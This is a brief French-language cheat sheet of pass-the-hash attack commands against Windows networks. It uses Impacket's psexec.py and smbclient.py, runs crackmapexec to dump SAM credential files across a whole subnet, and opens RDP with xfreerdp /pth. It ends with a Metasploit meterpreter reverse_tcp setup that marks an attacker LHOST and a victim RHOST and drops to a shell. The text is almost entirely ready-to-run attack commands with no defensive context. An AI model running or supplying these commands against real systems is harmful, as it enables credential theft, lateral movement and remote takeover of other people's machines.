Obtenir un Shell via pass-the-hash (Impacket Tools)
# ./psexec.py -hashes :thehash domaine/usager@192.168.2.22
Obtenir le fichier sam des ordinateurs d’un sous-réseau
# crackmappexec -u Administrator -H :thehash 10.5.24.0/24 –sam
Obtenir les partages avec pass-the-hash. smbclient.py est un outil de Impacket
# ./smbclient.py domaine/usager@192.168.2.99 -hashes :hash
Obtenir un remote desktop via pass-the-hash
# xfreerdp /u:usage /d:domaine /pth: thehash /v:192.168.2.33
Meterpreter via pass-the-hash
# set payload windows/meterpreter/reverse_tcp
# set LHOST 192.168.2.66 #attaquant
# set LPORT 443
# set RHOST 192.168.2.67 #victime
# set SMBPASS 01[...]03:01[...]03
# exploit
# shell
